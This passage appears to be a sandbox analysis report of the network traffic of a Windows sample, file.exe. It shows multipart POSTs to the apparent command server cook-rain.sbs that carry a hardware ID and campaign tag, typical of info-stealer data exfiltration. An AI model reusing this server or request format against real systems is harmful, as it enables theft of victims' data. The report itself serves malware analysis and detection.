                                                                                                                                                                        2024-11-21 09:37:24 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        21192.168.2.64973240.113.110.67443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:24 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 30 33 61 71 5a 43 6f 57 4d 45 61 44 5a 38 77 59 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 37 32 37 38 66 37 66 61 39 63 65 63 32 62 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: 03aqZCoWMEaDZ8wY.1Context: 467278f7fa9cec2b
                                                                                                                                                                        2024-11-21 09:37:24 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                        2024-11-21 09:37:24 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 30 33 61 71 5a 43 6f 57 4d 45 61 44 5a 38 77 59 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 37 32 37 38 66 37 66 61 39 63 65 63 32 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 6f 4a 67 77 33 78 62 6a 73 61 31 2b 45 45 5a 34 43 58 6d 57 77 51 41 64 6a 45 56 34 6b 49 75 52 78 36 36 73 4d 52 6e 39 74 6d 58 46 31 73 70 4d 7a 31 33 6d 59 43 63 55 68 6e 57 5a 6f 41 5a 30 37 58 31 39 6f 75 44 71 2f 6d 71 63 38 69 4b 61 55 4d 31 67 55 34 7a 35 70 71 47 76 54 39 50 37 58 4d 58 43 53 4e 74 75 70 6d 72 53
                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 03aqZCoWMEaDZ8wY.2Context: 467278f7fa9cec2b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXoJgw3xbjsa1+EEZ4CXmWwQAdjEV4kIuRx66sMRn9tmXF1spMz13mYCcUhnWZoAZ07X19ouDq/mqc8iKaUM1gU4z5pqGvT9P7XMXCSNtupmrS
                                                                                                                                                                        2024-11-21 09:37:24 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 30 33 61 71 5a 43 6f 57 4d 45 61 44 5a 38 77 59 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 37 32 37 38 66 37 66 61 39 63 65 63 32 62 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: 03aqZCoWMEaDZ8wY.3Context: 467278f7fa9cec2b
                                                                                                                                                                        2024-11-21 09:37:25 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                        2024-11-21 09:37:25 UTC58INData Raw: 4d 53 2d 43 56 3a 20 36 61 66 37 79 75 64 34 6b 45 43 32 2b 6f 69 4a 4f 59 64 45 57 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                        Data Ascii: MS-CV: 6af7yud4kEC2+oiJOYdEWg.0Payload parsing failed.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        22192.168.2.649733188.114.97.34434540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:25 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=EQG009UKQPB7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 12829
                                                                                                                                                                        Host: cook-rain.sbs
                                                                                                                                                                        2024-11-21 09:37:25 UTC12829OUTData Raw: 2d 2d 45 51 47 30 30 39 55 4b 51 50 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 30 35 45 31 41 45 31 45 46 38 38 32 44 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 45 51 47 30 30 39 55 4b 51 50 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 51 47 30 30 39 55 4b 51 50 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 51 47 30 30 39 55 4b
                                                                                                                                                                        Data Ascii: --EQG009UKQPB7Content-Disposition: form-data; name="hwid"91B05E1AE1EF882D63CFCF7E6C45F838--EQG009UKQPB7Content-Disposition: form-data; name="pid"2--EQG009UKQPB7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--EQG009UK
                                                                                                                                                                        2024-11-21 09:37:26 UTC985INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:25 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=aog73ih9bmlg1dj5m21vtafra0; expires=Mon, 17-Mar-2025 03:24:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Blms7jtxrQZOgoFr61YOpBeooEjk3DgNmk2YwoFLaxgfcJZ2UGhDjBMXgQxL0g%2FkLOjvF7WhGBlOo8C6DUlJTJM0lSdCA%2FSW9LG4qMtqti9sH5htdpPcqSGlFMmoE%2B4R"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e5fb374fdec425b-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1564&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13760&delivery_rate=1818181&cwnd=235&unsent_bytes=0&cid=1a49e1bbdd29ac86&ts=950&x=0"
                                                                                                                                                                        2024-11-21 09:37:26 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                        2024-11-21 09:37:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        23192.168.2.64973413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:26 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                        ETag: "0x8DC582B9698189B"
                                                                                                                                                                        x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093726Z-1777c6cb754lv4cqhC1TEB13us0000000aw0000000009v8b
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:26 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        24192.168.2.64973513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:26 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BBA701121"
                                                                                                                                                                        x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093726Z-178bfbc474bkvpdnhC1NYCuu2w00000001cg000000005g48
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:26 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        25192.168.2.64973613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:26 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                                                                                        x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093726Z-1777c6cb7542p5p4hC1TEBq0980000000avg00000000agnf
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:26 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        26192.168.2.64973713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:26 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 464
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                        x-ms-request-id: 918e3103-701e-0097-4a7c-3bb8c1000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093726Z-1777c6cb754wcxkwhC1TEB3c6w0000000asg00000000dmmp
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:27 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        27192.168.2.64973813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:26 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                        x-ms-request-id: 3c827ba2-d01e-0014-367c-3bed58000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093726Z-178bfbc474b9fdhphC1NYCac0n000000017g000000005qdm
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:27 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        28192.168.2.649739188.114.97.34434540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:27 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=X5HJLS102PF1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 15075
                                                                                                                                                                        Host: cook-rain.sbs
                                                                                                                                                                        2024-11-21 09:37:27 UTC15075OUTData Raw: 2d 2d 58 35 48 4a 4c 53 31 30 32 50 46 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 30 35 45 31 41 45 31 45 46 38 38 32 44 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 58 35 48 4a 4c 53 31 30 32 50 46 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 35 48 4a 4c 53 31 30 32 50 46 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 35 48 4a 4c 53 31 30
                                                                                                                                                                        Data Ascii: --X5HJLS102PF1Content-Disposition: form-data; name="hwid"91B05E1AE1EF882D63CFCF7E6C45F838--X5HJLS102PF1Content-Disposition: form-data; name="pid"2--X5HJLS102PF1Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--X5HJLS10
                                                                                                                                                                        2024-11-21 09:37:28 UTC987INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:28 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=au457489gar896a5qdau49c35k; expires=Mon, 17-Mar-2025 03:24:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMseFEKVgTBFYJIY4mkckJzZyo%2FJUN5YIKNq0YxOTk%2FSqxN8CQQVHyUxFJY7mq4caPgI5t7%2FBp6x%2B32xaFw8kicahwTjnPOU7gvVwWeFzSzQ98nojOW%2B1qyOuURKaKhq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e5fb385eb42b9c5-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
